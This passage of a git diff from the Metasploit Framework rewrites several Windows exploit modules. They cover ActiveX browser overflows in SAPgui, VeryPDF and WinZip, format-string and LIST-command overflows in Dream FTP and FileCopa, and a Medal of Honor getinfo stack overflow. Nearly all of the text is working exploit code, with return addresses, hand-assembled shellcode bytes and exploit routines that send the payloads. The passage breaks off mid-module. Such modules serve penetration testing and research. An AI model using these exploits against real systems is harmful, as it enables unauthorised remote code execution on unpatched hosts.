'OSVDB', '34779' ], + [ 'BID', '23412' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00\x09\x0a\x0d'\\", + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0', { 'Offset' => 200, 'Ret' => 0x0C0C0C0C } ] + ], + 'DisclosureDate' => 'Apr 11 2007', + 'DefaultTarget' => 0)) + end + + def autofilter + false + end + + def check_dependencies + use_zlib + end + + def on_request_uri(cli, request) + # Re-generate the payload + return if ((p = regenerate_payload(cli)) == nil) + + # Encode the shellcode + shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) + + # Setup exploit buffers + nops = Rex::Text.to_unescape([target.ret].pack('V')) + ret = Rex::Text.uri_encode([target.ret].pack('L')) + blocksize = 0x40000 + fillto 
= 500 + offset = target['Offset'] + + # Randomize the javascript variable names + sonic = rand_text_alpha(rand(100) + 1) + j_shellcode = rand_text_alpha(rand(100) + 1) + j_nops = rand_text_alpha(rand(100) + 1) + j_headersize = rand_text_alpha(rand(100) + 1) + j_slackspace = rand_text_alpha(rand(100) + 1) + j_fillblock = rand_text_alpha(rand(100) + 1) + j_block = rand_text_alpha(rand(100) + 1) + j_memory = rand_text_alpha(rand(100) + 1) + j_counter = rand_text_alpha(rand(30) + 2) + j_ret = rand_text_alpha(rand(100) + 1) + + # Build out the message + content = %Q| + + + + + | + + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") + + # Transmit the response to the client + send_response_html(cli, content) + + # Handle the payload + handler(cli) + end + +end diff --git a/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb b/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb index dee7c8407e..fdf653ed28 100644 --- a/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb +++ b/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb 
@@ -1,116 +1,116 @@ -### -## This file is part of the Metasploit Framework and may be subject to -## redistribution and commercial restrictions. Please see the Metasploit -## Framework web site for more information on licensing and terms of use. -## http://metasploit.com/framework/ -### - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote +### +## This file is part of the Metasploit Framework and may be subject to +## redistribution and commercial restrictions. Please see the Metasploit +## Framework web site for more information on licensing and terms of use. +## http://metasploit.com/framework/ +### + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking - - include Msf::Exploit::Remote::HttpServer::HTML - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'SAP AG SAPgui EAI WebViewer3D Buffer Overflow', - 'Description' => %q{ - This module exploits a stack overflow in Siemens Unigraphics Solutions - Teamcenter Visualization EAI WebViewer3D ActiveX control that is bundled - with SAPgui. When passing an overly long string the SaveViewToSessionFile() - method, arbitrary code may be executed. - }, - 'License' => MSF_LICENSE, - 'Author' => [ 'MC' ], - 'Version' => '$Revision$', - 'References' => - [ - [ 'CVE', '2007-4475' ], - [ 'OSVDB', '53066' ], - [ 'US-CERT-VU','985449' ], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Payload' => - { - 'Space' => 1024, - 'BadChars' => "\x00", - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ] - ], - 'DisclosureDate' => 'Mar 31 2009', - 'DefaultTarget' => 0)) - end - - def autofilter - false - end - - def check_dependencies - use_zlib - end - - def on_request_uri(cli, request) - # Re-generate the payload. - return if ((p = regenerate_payload(cli)) == nil) - - # Encode the shellcode. 
- shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - - # Create some nops. - nops = Rex::Text.to_unescape(make_nops(4)) - - # Set the return. - ret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, "or cl,[edx]").encode_string * 2) - - # Randomize the javascript variable names. - vname = rand_text_alpha(rand(100) + 1) - var_i = rand_text_alpha(rand(30) + 2) - rand1 = rand_text_alpha(rand(100) + 1) - rand2 = rand_text_alpha(rand(100) + 1) - rand3 = rand_text_alpha(rand(100) + 1) - rand4 = rand_text_alpha(rand(100) + 1) - rand5 = rand_text_alpha(rand(100) + 1) - rand6 = rand_text_alpha(rand(100) + 1) - rand7 = rand_text_alpha(rand(100) + 1) - rand8 = rand_text_alpha(rand(100) + 1) - - content = %Q| - - - - - | - - content = Rex::Text.randomize_space(content) - - print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") - - # Transmit the response to the client - send_response_html(cli, content) - - # Handle the payload - handler(cli) - end - -end + + include Msf::Exploit::Remote::HttpServer::HTML + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'SAP AG SAPgui EAI WebViewer3D Buffer Overflow', + 'Description' => %q{ + This module exploits a stack overflow in Siemens Unigraphics Solutions + Teamcenter Visualization EAI WebViewer3D ActiveX control that is bundled + with SAPgui. When passing an overly long string the SaveViewToSessionFile() + method, arbitrary code may be executed. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => [ 'MC' ], + 'Version' => '$Revision$', + 'References' => + [ + [ 'CVE', '2007-4475' ], + [ 'OSVDB', '53066' ], + [ 'US-CERT-VU','985449' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00", + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ] + ], + 'DisclosureDate' => 'Mar 31 2009', + 'DefaultTarget' => 0)) + end + + def autofilter + false + end + + def check_dependencies + use_zlib + end + + def on_request_uri(cli, request) + # Re-generate the payload. + return if ((p = regenerate_payload(cli)) == nil) + + # Encode the shellcode. + shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) + + # Create some nops. + nops = Rex::Text.to_unescape(make_nops(4)) + + # Set the return. + ret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, "or cl,[edx]").encode_string * 2) + + # Randomize the javascript variable names. + vname = rand_text_alpha(rand(100) + 1) + var_i = rand_text_alpha(rand(30) + 2) + rand1 = rand_text_alpha(rand(100) + 1) + rand2 = rand_text_alpha(rand(100) + 1) + rand3 = rand_text_alpha(rand(100) + 1) + rand4 = rand_text_alpha(rand(100) + 1) + rand5 = rand_text_alpha(rand(100) + 1) + rand6 = rand_text_alpha(rand(100) + 1) + rand7 = rand_text_alpha(rand(100) + 1) + rand8 = rand_text_alpha(rand(100) + 1) + + content = %Q| + + + + + | + + content = Rex::Text.randomize_space(content) + + print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") + + # Transmit the response to the client + send_response_html(cli, content) + + # Handle the payload + handler(cli) + end + +end diff --git a/modules/exploits/windows/browser/verypdf_pdfview.rb b/modules/exploits/windows/browser/verypdf_pdfview.rb index 8901962677..60f00f5610 100644 --- a/modules/exploits/windows/browser/verypdf_pdfview.rb 
+++ b/modules/exploits/windows/browser/verypdf_pdfview.rb 
@@ -1,114 +1,114 @@ -### -## This file is part of the Metasploit Framework and may be subject to -## redistribution and commercial restrictions. Please see the Metasploit -## Framework web site for more information on licensing and terms of use. -## http://metasploit.com/framework/ -### - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote +### +## This file is part of the Metasploit Framework and may be subject to +## redistribution and commercial restrictions. Please see the Metasploit +## Framework web site for more information on licensing and terms of use. +## http://metasploit.com/framework/ +### + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking - - include Msf::Exploit::Remote::HttpServer::HTML - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow', - 'Description' => %q{ - The VeryPDF PDFView ActiveX control is prone to a heap buffer-overflow - because it fails to properly bounds-check user-supplied data before copying - it into an insufficiently sized memory buffer. An attacker can exploit this issue - to execute arbitrary code within the context of the affected application. - }, - 'License' => MSF_LICENSE, - 'Author' => [ 'MC', 'dean ' ], - 'Version' => '$Revision$', - 'References' => - [ - [ 'CVE', '2008-5492'], - [ 'OSVDB', '49871'], - [ 'BID','32313' ], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Payload' => - { - 'Space' => 1024, - 'BadChars' => "\x00", - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0c0c0c0c } ] - ], - 'DisclosureDate' => 'June 16 2008', - 'DefaultTarget' => 0)) - end - - def autofilter - false - end - - def check_dependencies - use_zlib - end - - def on_request_uri(cli, request) - # Re-generate the payload. - return if ((p = regenerate_payload(cli)) == nil) - - # Encode the shellcode. 
- shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - - # Create some nops. - nops = Rex::Text.to_unescape(make_nops(4)) - - # Set the return. - ret = Rex::Text.uri_encode([target.ret].pack('L')) - - # Randomize the javascript variable names. - vname = rand_text_alpha(rand(100) + 1) - var_i = rand_text_alpha(rand(30) + 2) - rand1 = rand_text_alpha(rand(100) + 1) - rand2 = rand_text_alpha(rand(100) + 1) - rand3 = rand_text_alpha(rand(100) + 1) - rand4 = rand_text_alpha(rand(100) + 1) - rand5 = rand_text_alpha(rand(100) + 1) - rand6 = rand_text_alpha(rand(100) + 1) - rand7 = rand_text_alpha(rand(100) + 1) - rand8 = rand_text_alpha(rand(100) + 1) - - content = %Q| - - - - - | - - print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") - - # Transmit the response to the client - send_response_html(cli, content) - - # Handle the payload - handler(cli) - end - -end + + include Msf::Exploit::Remote::HttpServer::HTML + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow', + 'Description' => %q{ + The VeryPDF PDFView ActiveX control is prone to a heap buffer-overflow + because it fails to properly bounds-check user-supplied data before copying + it into an insufficiently sized memory buffer. An attacker can exploit this issue + to execute arbitrary code within the context of the affected application. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => [ 'MC', 'dean ' ], + 'Version' => '$Revision$', + 'References' => + [ + [ 'CVE', '2008-5492'], + [ 'OSVDB', '49871'], + [ 'BID','32313' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00", + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0c0c0c0c } ] + ], + 'DisclosureDate' => 'June 16 2008', + 'DefaultTarget' => 0)) + end + + def autofilter + false + end + + def check_dependencies + use_zlib + end + + def on_request_uri(cli, request) + # Re-generate the payload. + return if ((p = regenerate_payload(cli)) == nil) + + # Encode the shellcode. + shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) + + # Create some nops. + nops = Rex::Text.to_unescape(make_nops(4)) + + # Set the return. + ret = Rex::Text.uri_encode([target.ret].pack('L')) + + # Randomize the javascript variable names. + vname = rand_text_alpha(rand(100) + 1) + var_i = rand_text_alpha(rand(30) + 2) + rand1 = rand_text_alpha(rand(100) + 1) + rand2 = rand_text_alpha(rand(100) + 1) + rand3 = rand_text_alpha(rand(100) + 1) + rand4 = rand_text_alpha(rand(100) + 1) + rand5 = rand_text_alpha(rand(100) + 1) + rand6 = rand_text_alpha(rand(100) + 1) + rand7 = rand_text_alpha(rand(100) + 1) + rand8 = rand_text_alpha(rand(100) + 1) + + content = %Q| + + + + + | + + print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") + + # Transmit the response to the client + send_response_html(cli, content) + + # Handle the payload + handler(cli) + end + +end diff --git a/modules/exploits/windows/browser/winzip_fileview.rb b/modules/exploits/windows/browser/winzip_fileview.rb index 30307310dc..f2eeebf6e3 100644 --- a/modules/exploits/windows/browser/winzip_fileview.rb +++ b/modules/exploits/windows/browser/winzip_fileview.rb 
@@ -1,124 +1,124 @@ -### -## This file is part of the Metasploit Framework and may be subject to -## redistribution and commercial restrictions. Please see the Metasploit -## Framework web site for more information on licensing and terms of use. -## http://metasploit.com/framework/ -### - -require 'msf/core' - - -class Metasploit3 < Msf::Exploit::Remote +### +## This file is part of the Metasploit Framework and may be subject to +## redistribution and commercial restrictions. Please see the Metasploit +## Framework web site for more information on licensing and terms of use. +## http://metasploit.com/framework/ +### + +require 'msf/core' + + +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking - - include Msf::Exploit::Remote::HttpServer::HTML - - include Msf::Exploit::Remote::BrowserAutopwn - autopwn_info({ - :ua_name => HttpClients::IE, - :javascript => true, - :os_name => OperatingSystems::WINDOWS, - :vuln_test => 'CreateNewFolderFromName', - :classid => '{A09AE68F-B14D-43ED-B713-BA413F034904}', - :rank => NormalRanking # reliable memory corruption - }) - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow', - 'Description' => %q{ - The FileView ActiveX control (WZFILEVIEW.FileViewCtrl.61) could allow a - remote attacker to execute arbitrary code on the system. The control contains - several unsafe methods and is marked safe for scripting and safe for initialization. - A remote attacker could exploit this vulnerability to execute arbitrary code on the - victim system. WinZip 10.0 <= Build 6667 are vulnerable. 
- }, - 'License' => MSF_LICENSE, - 'Author' => [ 'dean ' ], - 'Version' => '$Revision$', - 'References' => - [ - [ 'CVE','2006-5198' ], - [ 'OSVDB', '30433' ], - [ 'BID','21060' ], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Payload' => - { - 'Space' => 1024, - 'BadChars' => "\x00", - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Windows XP SP0-SP2/ IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0c0c0c0c } ] - ], - 'DisclosureDate' => 'Nov 2 2007', - 'DefaultTarget' => 0)) - end - - def autofilter - false - end - - def check_dependencies - use_zlib - end - - def on_request_uri(cli, request) - # Re-generate the payload. - return if ((p = regenerate_payload(cli)) == nil) - - # Encode the shellcode. - shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - - # Set the return. - ret = Rex::Text.uri_encode([target.ret].pack('L')) - - # Randomize the javascript variable names. - vname = rand_text_alpha(rand(100) + 1) - var_i = rand_text_alpha(rand(30) + 2) - rand1 = rand_text_alpha(rand(100) + 1) - rand2 = rand_text_alpha(rand(100) + 1) - rand3 = rand_text_alpha(rand(100) + 1) - rand4 = rand_text_alpha(rand(100) + 1) - rand5 = rand_text_alpha(rand(100) + 1) - rand6 = rand_text_alpha(rand(100) + 1) - rand7 = rand_text_alpha(rand(100) + 1) - rand8 = rand_text_alpha(rand(100) + 1) - - content = %Q| - - - - - | - - print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") - - # Transmit the response to the client - send_response_html(cli, content) - - # Handle the payload - handler(cli) - end - -end - + + include Msf::Exploit::Remote::HttpServer::HTML + + include Msf::Exploit::Remote::BrowserAutopwn + autopwn_info({ + :ua_name => HttpClients::IE, + :javascript => true, + :os_name => OperatingSystems::WINDOWS, + :vuln_test => 'CreateNewFolderFromName', + :classid => '{A09AE68F-B14D-43ED-B713-BA413F034904}', + :rank => NormalRanking # reliable memory corruption + }) + + def initialize(info = {}) + 
super(update_info(info, + 'Name' => 'WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow', + 'Description' => %q{ + The FileView ActiveX control (WZFILEVIEW.FileViewCtrl.61) could allow a + remote attacker to execute arbitrary code on the system. The control contains + several unsafe methods and is marked safe for scripting and safe for initialization. + A remote attacker could exploit this vulnerability to execute arbitrary code on the + victim system. WinZip 10.0 <= Build 6667 are vulnerable. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'dean ' ], + 'Version' => '$Revision$', + 'References' => + [ + [ 'CVE','2006-5198' ], + [ 'OSVDB', '30433' ], + [ 'BID','21060' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00", + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP SP0-SP2/ IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0c0c0c0c } ] + ], + 'DisclosureDate' => 'Nov 2 2007', + 'DefaultTarget' => 0)) + end + + def autofilter + false + end + + def check_dependencies + use_zlib + end + + def on_request_uri(cli, request) + # Re-generate the payload. + return if ((p = regenerate_payload(cli)) == nil) + + # Encode the shellcode. + shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) + + # Set the return. + ret = Rex::Text.uri_encode([target.ret].pack('L')) + + # Randomize the javascript variable names. 
+ vname = rand_text_alpha(rand(100) + 1) + var_i = rand_text_alpha(rand(30) + 2) + rand1 = rand_text_alpha(rand(100) + 1) + rand2 = rand_text_alpha(rand(100) + 1) + rand3 = rand_text_alpha(rand(100) + 1) + rand4 = rand_text_alpha(rand(100) + 1) + rand5 = rand_text_alpha(rand(100) + 1) + rand6 = rand_text_alpha(rand(100) + 1) + rand7 = rand_text_alpha(rand(100) + 1) + rand8 = rand_text_alpha(rand(100) + 1) + + content = %Q| + + + + + | + + print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") + + # Transmit the response to the client + send_response_html(cli, content) + + # Handle the payload + handler(cli) + end + +end + diff --git a/modules/exploits/windows/ftp/dreamftp_format.rb b/modules/exploits/windows/ftp/dreamftp_format.rb index bb8e12d767..d49a08136e 100644 --- a/modules/exploits/windows/ftp/dreamftp_format.rb +++ b/modules/exploits/windows/ftp/dreamftp_format.rb 
@@ -1,87 +1,87 @@ -## -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - - +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + + class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking - + include Msf::Exploit::Remote::Tcp - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'BolinTech Dream FTP Server 1.02 Format String', - 'Description' => %q{ - This module exploits a format string overflow in the BolinTech - Dream FTP Server version 1.02. Based on the exploit by SkyLined. - }, - 'Author' => [ 'Patrick Webster ' ], - 'Arch' => [ ARCH_X86 ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$', - 'References' => - [ - [ 'CVE', '2004-2074'], - [ 'OSVDB', '4986'], - [ 'BID', '9800'], - [ 'URL', 'http://www.milw0rm.com/exploits/823'], - ], - 'Platform' => ['win'], - 'Privileged' => false, - 'Payload' => - { - 'Space' => 1000, - 'BadChars' => "\x00\x0a\x0d", - 'StackAdjustment' => -3500, - }, - 'Targets' => - [ - # Patrick - Tested OK 2007/09/10 against w2ksp0, w2ksp4 en. 
- [ - 'Dream FTP Server v1.02 Universal', - { - 'Offset' => 3957680, # 0x3c63ff-0x4f - } - ], - ], - 'DisclosureDate' => 'Mar 03 2004', - 'DefaultTarget' => 0)) - - register_options( - [ - Opt::RPORT(21), - ], self.class) - end - - def check - connect - banner = sock.get(-1,3) - disconnect - if (banner =~ /Dream FTP Server/) - return Exploit::CheckCode::Appears - end - return Exploit::CheckCode::Safe - end - - def exploit - connect - sleep(0.25) - sploit = "\xeb\x29" - sploit << "%8x%8x%8x%8x%8x%8x%8x%8x%" + target['Offset'].to_s + "d%n%n" - sploit << "@@@@@@@@" + payload.encoded - sock.put(sploit + "\r\n") - sleep(0.25) - handler - disconnect - end - + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'BolinTech Dream FTP Server 1.02 Format String', + 'Description' => %q{ + This module exploits a format string overflow in the BolinTech + Dream FTP Server version 1.02. Based on the exploit by SkyLined. + }, + 'Author' => [ 'Patrick Webster ' ], + 'Arch' => [ ARCH_X86 ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + [ 'CVE', '2004-2074'], + [ 'OSVDB', '4986'], + [ 'BID', '9800'], + [ 'URL', 'http://www.milw0rm.com/exploits/823'], + ], + 'Platform' => ['win'], + 'Privileged' => false, + 'Payload' => + { + 'Space' => 1000, + 'BadChars' => "\x00\x0a\x0d", + 'StackAdjustment' => -3500, + }, + 'Targets' => + [ + # Patrick - Tested OK 2007/09/10 against w2ksp0, w2ksp4 en. 
+ [ + 'Dream FTP Server v1.02 Universal', + { + 'Offset' => 3957680, # 0x3c63ff-0x4f + } + ], + ], + 'DisclosureDate' => 'Mar 03 2004', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(21), + ], self.class) + end + + def check + connect + banner = sock.get(-1,3) + disconnect + if (banner =~ /Dream FTP Server/) + return Exploit::CheckCode::Appears + end + return Exploit::CheckCode::Safe + end + + def exploit + connect + sleep(0.25) + sploit = "\xeb\x29" + sploit << "%8x%8x%8x%8x%8x%8x%8x%8x%" + target['Offset'].to_s + "d%n%n" + sploit << "@@@@@@@@" + payload.encoded + sock.put(sploit + "\r\n") + sleep(0.25) + handler + disconnect + end + end diff --git a/modules/exploits/windows/ftp/filecopa_list_overflow.rb b/modules/exploits/windows/ftp/filecopa_list_overflow.rb index 0eacb75dbe..64edf00cef 100644 --- a/modules/exploits/windows/ftp/filecopa_list_overflow.rb +++ b/modules/exploits/windows/ftp/filecopa_list_overflow.rb 
@@ -1,59 +1,59 @@ -require 'msf/core' - - +require 'msf/core' + + class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking - + include Msf::Exploit::Remote::Ftp - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'FileCopa FTP Server pre 18 Jul Version', - 'Description' => %q{ - This module exploits the buffer overflow found in the LIST command - in fileCOPA FTP server pre 18 Jul 2006 version discovered by www.appsec.ch - }, - 'Author' => [ 'Jacopo Cervini' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$', - 'References' => - [ + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'FileCopa FTP Server pre 18 Jul Version', + 'Description' => %q{ + This module exploits the buffer overflow found in the LIST command + in fileCOPA FTP server pre 18 Jul 2006 version discovered by www.appsec.ch + }, + 'Author' => [ 'Jacopo Cervini' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ [ 'CVE', '2006-3726' ], - [ 'OSVDB', '27389' ], - [ 'BID', '19065' ], - ], - 'Privileged' => true, - 'Payload' => - { - 'Space' => 400, - 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", - 'StackAdjustment' => -3500, - }, - 'Platform' => 'win', - - 'Targets' => - [ - [ 'Windows 2k Server SP4 English', { 'Ret' => 0x7c2e7993, 'Nops' => 160 } ], # jmp esp - [ 'Windows XP Pro SP2 Italian', { 'Ret' => 0x77f62740, 'Nops' => 240 } ] # jmp esp - ], - 'DisclosureDate' => 'Jul 19 2006', - 'DefaultTarget' => 0)) - end - - - def exploit - connect_login - - print_status("Trying target #{target.name}...") - - sploit = "A " - sploit << make_nops(target['Nops']) - sploit << [target.ret].pack('V') + make_nops(4) + "\x66\x81\xc1\xa0\x01\x51\xc3" + make_nops(189) + payload.encoded - - send_cmd( ['LIST', sploit] , false) - - handler - disconnect - end - + [ 'OSVDB', '27389' ], + [ 'BID', '19065' ], + ], + 'Privileged' => true, + 'Payload' => + { + 'Space' => 400, + 'BadChars' => 
"\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + + 'Targets' => + [ + [ 'Windows 2k Server SP4 English', { 'Ret' => 0x7c2e7993, 'Nops' => 160 } ], # jmp esp + [ 'Windows XP Pro SP2 Italian', { 'Ret' => 0x77f62740, 'Nops' => 240 } ] # jmp esp + ], + 'DisclosureDate' => 'Jul 19 2006', + 'DefaultTarget' => 0)) + end + + + def exploit + connect_login + + print_status("Trying target #{target.name}...") + + sploit = "A " + sploit << make_nops(target['Nops']) + sploit << [target.ret].pack('V') + make_nops(4) + "\x66\x81\xc1\xa0\x01\x51\xc3" + make_nops(189) + payload.encoded + + send_cmd( ['LIST', sploit] , false) + + handler + disconnect + end + end diff --git a/modules/exploits/windows/games/mohaa_getinfo.rb b/modules/exploits/windows/games/mohaa_getinfo.rb index 0085327b6f..68afea0315 100644 --- a/modules/exploits/windows/games/mohaa_getinfo.rb +++ b/modules/exploits/windows/games/mohaa_getinfo.rb 
@@ -1,97 +1,97 @@ -## -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - - -require 'msf/core' - - -class Metasploit3 < Msf::Exploit::Remote +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + +require 'msf/core' + + +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking - - include Msf::Exploit::Remote::Udp - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Medal Of Honor Allied Assault getinfo Stack Overflow', - 'Description' => %q{ - This module exploits a stack based buffer overflow in the getinfo - command of Medal Of Honor Allied Assault. 
- }, - 'Author' => [ 'Jacopo Cervini' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$', - 'References' => - [ - [ 'CVE', '2004-0735'], - [ 'OSVDB', '8061' ], - [ 'URL', 'http://www.milw0rm.com/exploits/357'], - [ 'BID', '10743'], - ], - 'Privileged' => false, - 'Payload' => - { - 'Space' => 512, - 'BadChars' => "\x00", - }, - 'Platform' => 'win', - 'Targets' => - [ - ['Medal Of Honor Allied Assault v 1.0 Universal', { 'Rets' => [ 111, 0x406957 ] }], # call ebx - ], - 'DisclosureDate' => 'Jul 17 2004', - 'DefaultTarget' => 0)) - - register_options( - [ - Opt::RPORT(12203) - ], self.class) - end - - def exploit - connect_udp - - # We should convert this to metasm - Patrick - buf = 'B' * target['Rets'][0] - buf << "\x68\x76\x76\x76\x76"*9 # PUSH 76767676 x 9 - buf << "\x68\x7f\x7f\x7f\x7f" # PUSH 7F7F7F7F - buf << "\x57" # PUSH EDI - buf << "\x58" # POP EAX - buf << "\x32\x64\x24\x24" # XOR AH,BYTE PTR SS:[ESP+24] - buf << "\x32\x24\x24" # XOR AH,BYTE PTR SS:[ESP] - buf << "\x48"*150 # DEC EAX x 150 - buf << "\x50\x50" # PUSH EAX x 2 - buf << "\x53" # PUSH EBX - buf << "\x58" # POP EAX - buf << "\x51" # PUSH ECX - buf << "\x32\x24\x24" # XOR AH,BYTE PTR SS:[ESP] - buf << "\x6a\x7f" # PUSH 7F - buf << "\x5e" # POP ESI - buf << "\x46"*37 # INC ESI - buf << "\x56"*10 # PUSH ESI - buf << "\x32\x44\x24\x24" # XOR AL,BYTE PTR SS:[ESP+24] - buf << "\x49\x49" # DEC ECX - buf << "\x31\x48\x34" # XOR DWORD PTR DS:[EAX+34],ECX - buf << "\x58"*11 # POP EAX - buf << "\x42"*66 - buf << "\x3c"*4 - buf << "\x42"*48 - buf << [ target['Rets'][1] ].pack('V') - - req = "\xff\xff\xff\xff\x02" + "getinfo " + buf - req << "\r\n\r\n" + make_nops(32) + payload.encoded - - udp_sock.put(req) - - handler - disconnect_udp - end - -end + + include Msf::Exploit::Remote::Udp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Medal Of Honor Allied Assault getinfo Stack Overflow', + 'Description' => %q{ + This module exploits a stack based buffer overflow in the getinfo + 
command of Medal Of Honor Allied Assault. + }, + 'Author' => [ 'Jacopo Cervini' ], + 'License' => BSD_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + [ 'CVE', '2004-0735'], + [ 'OSVDB', '8061' ], + [ 'URL', 'http://www.milw0rm.com/exploits/357'], + [ 'BID', '10743'], + ], + 'Privileged' => false, + 'Payload' => + { + 'Space' => 512, + 'BadChars' => "\x00", + }, + 'Platform' => 'win', + 'Targets' => + [ + ['Medal Of Honor Allied Assault v 1.0 Universal', { 'Rets' => [ 111, 0x406957 ] }], # call ebx + ], + 'DisclosureDate' => 'Jul 17 2004', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(12203) + ], self.class) + end + + def exploit + connect_udp + + # We should convert this to metasm - Patrick + buf = 'B' * target['Rets'][0] + buf << "\x68\x76\x76\x76\x76"*9 # PUSH 76767676 x 9 + buf << "\x68\x7f\x7f\x7f\x7f" # PUSH 7F7F7F7F + buf << "\x57" # PUSH EDI + buf << "\x58" # POP EAX + buf << "\x32\x64\x24\x24" # XOR AH,BYTE PTR SS:[ESP+24] + buf << "\x32\x24\x24" # XOR AH,BYTE PTR SS:[ESP] + buf << "\x48"*150 # DEC EAX x 150 + buf << "\x50\x50" # PUSH EAX x 2 + buf << "\x53" # PUSH EBX + buf << "\x58" # POP EAX + buf << "\x51" # PUSH ECX + buf << "\x32\x24\x24" # XOR AH,BYTE PTR SS:[ESP] + buf << "\x6a\x7f" # PUSH 7F + buf << "\x5e" # POP ESI + buf << "\x46"*37 # INC ESI + buf << "\x56"*10 # PUSH ESI + buf << 